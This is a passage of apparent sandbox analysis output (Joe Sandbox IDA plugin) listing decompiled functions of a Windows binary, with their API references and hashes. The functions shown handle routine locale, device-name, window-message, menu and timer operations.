      						while(_t92 <= E00404D00(_t124)) {
      							_t83 =  *(_t124 + _t92 - 1) - 0x47;
      							__eflags = _t83;
      							if(_t83 != 0) {
      								__eflags = _t83 != 0x20;
      								if(_t83 != 0x20) {
      									E00404C28();
      									E00404D08(_t122, _v16);
      								}
      							}
      							_t92 = _t92 + 1;
      							__eflags = _t92;
      						}
      					}
      				}
      				L28:
      				_pop(_t111);
      				 *[fs:eax] = _t111;
      				_push(E0040C929);
      				return E00404A64( &_v24, 4);
      			}

      0x0040c758
      0x0040c75d
      0x0040c75e
      0x0040c75f
      0x0040c760
      0x0040c761
      0x0040c765
      0x0040c767
      0x0040c76b
      0x0040c76c
      0x0040c771
      0x0040c774
      0x0040c777
      0x0040c77e
      0x0040c796
      0x0040c7ae
      0x0040c8f8
      0x0040c8fa
      0x0040c8ff
      0x0040c901
      0x00000000
      0x00000000
      0x0040c817
      0x0040c81c
      0x0040c823
      0x0040c861
      0x0040c866
      0x0040c868
      0x0040c887
      0x0040c88c
      0x0040c88e
      0x0040c8af
      0x0040c8b4
      0x0040c8b6
      0x0040c8cb
      0x0040c8cb
      0x0040c8cd
      0x0040c8d3
      0x0040c8da
      0x0040c8cf
      0x0040c8cf
      0x0040c8d1
      0x0040c8e8
      0x0040c8f2
      0x00000000
      0x00000000
      0x00000000
      0x0040c8d1
      0x0040c8b8
      0x0040c8bf
      0x0040c8c4
      0x0040c8c4
      0x0040c890
      0x0040c897
      0x0040c89c
      0x0040c89c
      0x0040c86a
      0x0040c871
      0x0040c876
      0x0040c876
      0x0040c8f7
      0x0040c8f7
      0x0040c825
      0x0040c82e
      0x0040c83c
      0x0040c846
      0x0040c84b
      0x0040c84b
      0x0040c823
      0x0040c7b4
      0x0040c7b4
      0x0040c7b9
      0x0040c7bc
      0x0040c7ca
      0x0040c7c6
      0x0040c7c6
      0x0040c7c6
      0x0040c7ce
      0x0040c809
      0x0040c7d0
      0x0040c7f5
      0x0040c7d6
      0x0040c7d6
      0x0040c7d8
      0x0040c7da
      0x0040c7dc
      0x0040c7e5
      0x0040c7ef
      0x0040c7ef
      0x0040c7dc
      0x0040c7f4
      0x0040c7f4
      0x0040c7f4
      0x0040c800
      0x0040c7ce
      0x0040c907
      0x0040c909
      0x0040c90c
      0x0040c90f
      0x0040c921

      APIs
      • GetThreadLocale.KERNEL32(?,00000000,0040C922,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040C787
        • Part of subcall function 0040C420: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C43E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Locale$InfoThread
      • String ID: eeee$ggg$yyyy
      • API String ID: 4232894706-1253427255
      • Opcode ID: b005bbb43cbd58ecc22ec0173e37a4ea2652d8ffc49779c81ba8086e7235038a
      • Instruction ID: f016c298c3575a6554fe4c088fae9ffd98c4ad1e01a8414faab90444f8feea09
      • Opcode Fuzzy Hash: b005bbb43cbd58ecc22ec0173e37a4ea2652d8ffc49779c81ba8086e7235038a
      • Instruction Fuzzy Hash: 8E41D3B2704105CBD711B76998C16BEB296DFC5308B60863BE451B33D2D73CAD02A62D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 73%
      			E0047BFC4(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
      				char _v8;
      				char _v12;
      				char _v16;
      				char _v528;
      				char _v532;
      				char _v536;
      				char _v540;
      				char* _t43;
      				intOrPtr* _t66;
      				intOrPtr _t74;
      				void* _t85;
      				char _t86;
      				intOrPtr _t103;
      				void* _t112;
      				void* _t114;
      				void* _t117;
      
      				_v532 = 0;
      				_v8 = 0;
      				_v12 = 0;
      				_v16 = 0;
      				_t114 = __ecx;
      				_t112 = __edx;
      				_t85 = __eax;
      				_push(_t117);
      				_push(0x47c159);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t117 + 0xfffffde8;
      				E00404A40(__ecx);
      				E0040508C( &_v8, 0x400);
      				if(_t112 != 0) {
      					E00404C38( &_v532, _t112);
      					E00404D4C( &_v12, _v532, "\\Device\\");
      					_t86 = 0x41;
      					do {
      						_t43 =  &_v536;
      						 *((char*)(_t43 + 1)) = _t86;
      						 *_t43 = 1;
      						E0040337C( &_v540,  &_v536);
      						E0040334C( &_v540, 2, 0x47c1a4);
      						E00404CA4( &_v16,  &_v540);
      						E00407A30();
      						if(QueryDosDeviceA(E00404F00(_v16),  &_v528, 0x1ff) != 0 && E00408EFC(E00404F00(_v12),  &_v528) == 0) {
      							E00404A94(_t114, _v16);
      						}
      						_t86 = _t86 + 1;
      					} while (_t86 < 0x5a);
      					L8:
      					_pop(_t103);
      					 *[fs:eax] = _t103;
      					_push(0x47c160);
      					E00404A40( &_v532);
      					return E00404A64( &_v16, 3);
      				}
      				_t66 =  *0x48f538; // 0x490c50
      				E0047FD7C( *_t66, _t85, 0, "GetDeviceNameByDeviceAddress", _t112, _t114, __fp0);
      				_push(E00404F00(_v8));
      				_push( *((intOrPtr*)(_t85 + 4)));
      				_push( *((intOrPtr*)(_t85 + 3)));
      				_push( *((intOrPtr*)(_t85 + 2)));
      				_t74 =  *((intOrPtr*)(_t85 + 1));
      				_push(_t74);
      				L00465DD4();
      				if(_t74 == 0) {
      					E00404C38( &_v8, E00404F00(_v8));
      					E00404FA0( &_v8, 4, 1);
      					E00404A94(_t114, _v8);
      				}
      				goto L8;
      			}

      0x0047bfd2
      0x0047bfd8
      0x0047bfdb
      0x0047bfde
      0x0047bfe1
      0x0047bfe3
      0x0047bfe5
      0x0047bfe9
      0x0047bfea
      0x0047bfef
      0x0047bff2
      0x0047bff7
      0x0047c004
      0x0047c00b
      0x0047c081
      0x0047c094
      0x0047c099
      0x0047c09b
      0x0047c09b
      0x0047c0a3
      0x0047c0a6
      0x0047c0b5
      0x0047c0c7
      0x0047c0d5
      0x0047c0e5
      0x0047c106
      0x0047c124
      0x0047c124
      0x0047c129
      0x0047c12a
      0x0047c133
      0x0047c135
      0x0047c138
      0x0047c13b
      0x0047c146
      0x0047c158
      0x0047c158
      0x0047c00d
      0x0047c01b
      0x0047c028
      0x0047c02c
      0x0047c030
      0x0047c034
      0x0047c035
      0x0047c038
      0x0047c039
      0x0047c040
      0x0047c053
      0x0047c065
      0x0047c06f
      0x0047c06f
      0x00000000

      APIs
      • StarBurn_GetDeviceNameByDeviceAddress.STARBURN(?,?,?,?,00000000,00000000,0047C159), ref: 0047C039
      • QueryDosDeviceA.KERNEL32(00000000,?,000001FF), ref: 0047C0FF
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Device$AddressBurn_NameQueryStar
      • String ID: GetDeviceNameByDeviceAddress$\Device\
      • API String ID: 3412940214-1850406243
      • Opcode ID: 9fc7f0954599a777c1cc60587033250be0a7bab543de7d307c5fd966cbac35c3
      • Instruction ID: f02919aed20942ec0b740d542c18dd7e5c0a80d9b67f94e0639826cab4e13efd
      • Opcode Fuzzy Hash: 9fc7f0954599a777c1cc60587033250be0a7bab543de7d307c5fd966cbac35c3
      • Instruction Fuzzy Hash: B341AB74A441089FDB10EF65D8C16CEB7B9DF88304F5080BBA508E7256DB789E458F6C
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 76%
      			E00472AF8(intOrPtr __eax, void* __ebx, int __edx, void* __edi, void* __esi) {
      				intOrPtr _v8;
      				int _v12;
      				char _v16;
      				char _v20;
      				intOrPtr _v24;
      				intOrPtr _v28;
      				void* _v32;
      				char _v36;
      				intOrPtr _t37;
      				intOrPtr _t56;
      				intOrPtr _t68;
      				int _t73;
      				int _t74;
      				int _t79;
      				intOrPtr _t80;
      				void* _t84;
      				int _t86;
      				void* _t88;
      				void* _t89;
      				intOrPtr _t90;
      
      				_t79 = __edx;
      				_t88 = _t89;
      				_t90 = _t89 + 0xffffffe0;
      				_v36 = 0;
      				_t86 = __edx;
      				_v8 = __eax;
      				_push(_t88);
      				_push(0x472c4b);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t90;
      				_v12 = __edx;
      				_t37 =  *((intOrPtr*)(_v8 + 0x18));
      				if(_t37 == 0) {
      					_t79 = 1;
      					_v20 = E00403BC0(1);
      				} else {
      					_v20 = _t37;
      				}
      				_v16 = _v20;
      				_push(_t88);
      				_push(0x472c2e);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t90;
      				_v32 =  &_v16;
      				_v24 = E00472A04;
      				_v28 = 0;
      				_t84 = E0041C1A4(_t86);
      				if( *((char*)(_v8 + 0x14)) == 0) {
      					_t73 = 2;
      				} else {
      					_t73 = 1;
      				}
      				SendMessageA(E0044B158( *((intOrPtr*)(_v8 + 0x10))), 0x449, _t73,  &_v32);
      				if(_t73 == 2 && _v28 != 0) {
      					asm("cdq");
      					E0041C1C4(_t86, _t84, _t79);
      					if( *((char*)(_v8 + 0x14)) == 0) {
      						_t74 = 1;
      					} else {
      						_t74 = 2;
      					}
      					SendMessageA(E0044B158( *((intOrPtr*)(_v8 + 0x10))), 0x449, _t74,  &_v32);
      					if(_v28 != 0) {
      						_t68 =  *0x48f864; // 0x466c68
      						E00406A3C(_t68, 0,  &_v36);
      						E0040CBEC(_v36, 1);
      						E004043D0();
      					}
      				}
      				_pop(_t80);
      				 *[fs:eax] = _t80;
      				_push(0x472c35);
      				_t56 = _v8;
      				if( *((intOrPtr*)(_t56 + 0x18)) != 0) {
      					return _t56;
      				} else {
      					return E00403BF0(_v20);
      				}
      			}

      0x00472af8
      0x00472af9
      0x00472afb
      0x00472b03
      0x00472b06
      0x00472b08
      0x00472b0d
      0x00472b0e
      0x00472b13
      0x00472b16
      0x00472b19
      0x00472b1f
      0x00472b24
      0x00472b37
      0x00472b3e
      0x00472b26
      0x00472b26
      0x00472b26
      0x00472b44
      0x00472b49
      0x00472b4a
      0x00472b4f
      0x00472b52
      0x00472b58
      0x00472b60
      0x00472b65
      0x00472b6f
      0x00472b78
      0x00472b81
      0x00472b7a
      0x00472b7a
      0x00472b7a
      0x00472b9c
      0x00472ba4
      0x00472bae
      0x00472bb3
      0x00472bbf
      0x00472bc8
      0x00472bc1
      0x00472bc1
      0x00472bc1
      0x00472be3
      0x00472bec
      0x00472bf1
      0x00472bf6
      0x00472c05
      0x00472c0a
      0x00472c0a
      0x00472bec
      0x00472c11
      0x00472c14
      0x00472c17
      0x00472c1c
      0x00472c23
      0x00472c2d
      0x00472c25
      0x00000000
      0x00472c28

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend
      • String ID: TsA$hlF
      • API String ID: 3850602802-2645589683
      • Opcode ID: eebda259ea33f81a96385061153047f765f2b03fef2eb9bcce3897491fa5ac3c
      • Instruction ID: 65c04a079f4804e9f5c118b37566fdf300e76784480acfe307d168b6e554fe39
      • Opcode Fuzzy Hash: eebda259ea33f81a96385061153047f765f2b03fef2eb9bcce3897491fa5ac3c
      • Instruction Fuzzy Hash: 09416F70A002089FDB11DF59CD85AEEB7F9EB08304F118866F904E7391D778AE40DB99
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 77%
      			E00472F98(char __edx, void* __edi, void* __fp0) {
      				char _v5;
      				void* __ecx;
      				void* __ebp;
      				intOrPtr* _t17;
      				intOrPtr _t39;
      				intOrPtr _t40;
      				intOrPtr* _t44;
      				intOrPtr* _t47;
      				char _t53;
      				void* _t65;
      				intOrPtr _t66;
      				intOrPtr _t67;
      				void* _t68;
      				void* _t69;
      				void* _t73;
      
      				_t73 = __fp0;
      				_t65 = __edi;
      				_t53 = __edx;
      				if(__edx != 0) {
      					_t69 = _t69 + 0xfffffff0;
      					_t17 = E00403F68(_t17, _t68);
      				}
      				_v5 = _t53;
      				_t47 = _t17;
      				E004361F8(0, _t65, _t73);
      				 *(_t47 + 0x50) =  *(_t47 + 0x50) |  *0x4730c0;
      				 *((intOrPtr*)(_t47 + 0x234)) = E0047191C(_t47, 1, 0);
      				 *((intOrPtr*)(_t47 + 0x238)) = E0047191C(_t47, 1, 1);
      				 *((intOrPtr*)(_t47 + 0x23c)) = E00471F18(_t47, 1);
      				_t66 = E00403BC0(1);
      				 *((intOrPtr*)(_t47 + 0x248)) = _t66;
      				 *((intOrPtr*)(_t66 + 0x10)) = _t47;
      				E0044B38C(_t47, 1);
      				E004440E4(_t47, 0xb9);
      				E00444108(_t47, 0x59);
      				 *((intOrPtr*)( *_t47 + 0x5c))();
      				 *((char*)(_t47 + 0x1f8)) = 0;
      				 *((char*)(_t47 + 0x258)) = 1;
      				_t39 = E00473660(_t47, 1);
      				_push(0);
      				L00407658();
      				_t67 = _t39;
      				_push(0x5a);
      				_push(_t67);
      				L00407348();
      				 *((intOrPtr*)(_t47 + 0x244)) = _t39;
      				_t40 =  *0x46aea8; // 0x46aef4
      				 *((intOrPtr*)(_t47 + 0x25c)) = _t40;
      				_push(_t67);
      				_push(0);
      				L004078C0();
      				 *((char*)(_t47 + 0x240)) =  *((intOrPtr*)(_t47 + 0x224));
      				E00445AE8(_t47, 0, 0xb03d, 0);
      				_t44 = _t47;
      				if(_v5 != 0) {
      					E00403FC0(_t44);
      					_pop( *[fs:0x0]);
      				}
      				return _t47;
      			}

      0x00472f98
      0x00472f98
      0x00472f98
      0x00472fa0
      0x00472fa2
      0x00472fa5
      0x00472fa5
      0x00472faa
      0x00472fad
      0x00472fb3
      0x00472fc1
      0x00472fd4
      0x00472fea
      0x00472ffe
      0x00473010
      0x00473012
      0x00473018
      0x0047301f
      0x0047302b
      0x00473037
      0x00473042
      0x00473045
      0x0047304c
      0x00473057
      0x0047305c
      0x0047305e
      0x00473063
      0x00473065
      0x00473067
      0x00473068
      0x0047306d
      0x00473073
      0x00473078
      0x0047307e
      0x0047307f
      0x00473081
      0x0047308c
      0x0047309d
      0x004730a2
      0x004730a8
      0x004730aa
      0x004730af
      0x004730b6
      0x004730bf

      APIs
      • 73BEAC50.USER32(00000000), ref: 0047305E
      • 73BEAD70.GDI32(00000000,0000005A,00000000), ref: 00473068
      • 73BEB380.USER32(00000000,00000000,00000000,0000005A,00000000), ref: 00473081
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B380
      • String ID: |#G
      • API String ID: 120756276-4105956212
      • Opcode ID: f38f537c9392e8b4d041168e58ff5e02b4bbf6c6342e6286e3fb149a5967cd5f
      • Instruction ID: 46cc195291b09597a959c5a12c64461a9f5205a36dc9f345357bb0829e7548bb
      • Opcode Fuzzy Hash: f38f537c9392e8b4d041168e58ff5e02b4bbf6c6342e6286e3fb149a5967cd5f
      • Instruction Fuzzy Hash: 7A318F307046419FE700AF3E9CC67993BA1AB05308F04417EFC0C9F397DA7AA9489B5A
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 59%
      			E0042B308(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				intOrPtr _t62;
      				intOrPtr _t64;
      				intOrPtr _t67;
      				void* _t77;
      				void* _t78;
      				intOrPtr _t79;
      				intOrPtr _t80;
      
      				_t77 = _t78;
      				_t79 = _t78 + 0xfffffff8;
      				_v8 = __eax;
      				_v12 = E00403BC0(1);
      				_push(_t77);
      				_push(0x42b38f);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t79;
      				 *((intOrPtr*)(_v12 + 8)) = __edx;
      				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
      				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
      				_t80 = _t79 + 0xc;
      				 *((char*)(_v12 + 0x70)) = _a8;
      				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
      					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
      				}
      				_t62 =  *0x417d18; // 0x417d64
      				 *((intOrPtr*)(_v12 + 0x6c)) = E00403DAC(_a4, _t62);
      				_pop(_t64);
      				 *[fs:eax] = _t64;
      				_push(0x4908ac);
      				L00406FE8();
      				_push(_t77);
      				_push(0x42b3ef);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t80;
      				E00429E74( *((intOrPtr*)(_v8 + 0x28)));
      				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
      				E00429E70(_v12);
      				_pop(_t67);
      				 *[fs:eax] = _t67;
      				_push(0x42b3f6);
      				_push(0x4908ac);
      				L00407188();
      				return 0;
      			}

      0x0042b309
      0x0042b30b
      0x0042b315
      0x0042b324
      0x0042b329
      0x0042b32a
      0x0042b32f
      0x0042b332
      0x0042b338
      0x0042b33e
      0x0042b351
      0x0042b351
      0x0042b359
      0x0042b363
      0x0042b36e
      0x0042b36e
      0x0042b374
      0x0042b382
      0x0042b387
      0x0042b38a
      0x0042b3a6
      0x0042b3ab
      0x0042b3b2
      0x0042b3b3
      0x0042b3b8
      0x0042b3bb
      0x0042b3c4
      0x0042b3cf
      0x0042b3d2
      0x0042b3d9
      0x0042b3dc
      0x0042b3df
      0x0042b3e4
      0x0042b3e9
      0x0042b3ee

      APIs
      • RtlEnterCriticalSection.KERNEL32(004908AC), ref: 0042B3AB
      • RtlLeaveCriticalSection.KERNEL32(004908AC,0042B3F6,004908AC), ref: 0042B3E9
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalSection$EnterLeave
      • String ID: HKB$d}A
      • API String ID: 3168844106-1457535182
      • Opcode ID: 1f38f0d75cafb898dcba265b0d05fc521e582eb6826c197028024ce9c301976f
      • Instruction ID: 36fd7c0ab21802537125e5207975b2eb6918c76cfe41e103440dfda8f4c2234e
      • Opcode Fuzzy Hash: 1f38f0d75cafb898dcba265b0d05fc521e582eb6826c197028024ce9c301976f
      • Instruction Fuzzy Hash: 13217C75B04308EFC701DF69D881989BBF5FF49720B6181A6E844A77A1D774EE80CA98
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 93%
      			E0045801C(intOrPtr* __eax) {
      				struct tagMENUITEMINFOA _v128;
      				intOrPtr _v132;
      				int _t16;
      				intOrPtr* _t29;
      				struct HMENU__* _t36;
      				MENUITEMINFOA* _t37;
      
      				_t37 =  &_v128;
      				_t29 = __eax;
      				_t16 =  *0x48f9e0; // 0x490740
      				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
      					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
      					_t37->cbSize = 0x2c;
      					_v132 = 0x10;
      					_v128.hbmpUnchecked =  &(_v128.cch);
      					_v128.dwItemData = 0x50;
      					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
      					if(_t16 != 0) {
      						_t16 = E004583D0(_t29);
      						asm("sbb edx, edx");
      						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
      							_v128.cbSize = ((E004583D0(_t29) & 0x0000007f) << 0x0000000d) + ((E004583D0(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
      							_v132 = 0x10;
      							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
      							if(_t16 != 0) {
      								return DrawMenuBar( *(_t29 + 0x38));
      							}
      						}
      					}
      				}
      				return _t16;
      			}

      0x0045801e
      0x00458021
      0x00458023
      0x0045802c
      0x00458043
      0x00458045
      0x0045804c
      0x00458058
      0x0045805c
      0x0045806a
      0x00458071
      0x00458075
      0x00458087
      0x0045808c
      0x004580aa
      0x004580ae
      0x004580bc
      0x004580c3
      0x00000000
      0x004580c9
      0x004580c3
      0x0045808c
      0x00458071
      0x004580d6

      APIs
      • GetMenuItemInfoA.USER32 ref: 0045806A
      • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 004580BC
      • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 004580C9
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Menu$InfoItem$Draw
      • String ID: P
      • API String ID: 3227129158-3110715001
      • Opcode ID: 1f8921f937ca2d31d1c93dbf41a94e3bb5feaa5468b06d2109982b46cd960e4f
      • Instruction ID: 8ef5379e858853adbb00536767b5f0ece2596a22c612a2d3fa24e7475ca92aa5
      • Opcode Fuzzy Hash: 1f8921f937ca2d31d1c93dbf41a94e3bb5feaa5468b06d2109982b46cd960e4f
      • Instruction Fuzzy Hash: A411B2706062006FD3209F28CC81B4B76D5AB84765F148A6DF494D73E6DBB9D848C74A
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 58%
      			E0043B020(void* __eax, void* __ebx, void* __ecx, void* __esi) {
      				char _v8;
      				intOrPtr _t18;
      				void* _t23;
      				void* _t24;
      				intOrPtr _t28;
      				int _t32;
      				intOrPtr _t35;
      
      				_t24 = __ecx;
      				_push(0);
      				_t23 = __eax;
      				_push(_t35);
      				_push(0x43b09f);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t35;
      				KillTimer( *(__eax + 0x34), 1);
      				_t32 =  *(_t23 + 0x30);
      				if(_t32 != 0 &&  *((char*)(_t23 + 0x40)) != 0 &&  *((short*)(_t23 + 0x3a)) != 0 && SetTimer( *(_t23 + 0x34), 1, _t32, 0) == 0) {
      					_t18 =  *0x48f9b4; // 0x423b38
      					E00406A3C(_t18, _t24,  &_v8);
      					E0040CBEC(_v8, 1);
      					E004043D0();
      				}
      				_pop(_t28);
      				 *[fs:eax] = _t28;
      				_push(0x43b0a6);
      				return E00404A40( &_v8);
      			}

      0x0043b020
      0x0043b023
      0x0043b027
      0x0043b02b
      0x0043b02c
      0x0043b031
      0x0043b034
      0x0043b03d
      0x0043b042
      0x0043b047
      0x0043b06b
      0x0043b070
      0x0043b07f
      0x0043b084
      0x0043b084
      0x0043b08b
      0x0043b08e
      0x0043b091
      0x0043b09e

      APIs
      • KillTimer.USER32(?,00000001,00000000,0043B09F,?,?,?,00000000), ref: 0043B03D
      • SetTimer.USER32(?,00000001,?,00000000), ref: 0043B05F
        • Part of subcall function 00406A3C: LoadStringA.USER32 ref: 00406A6E
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
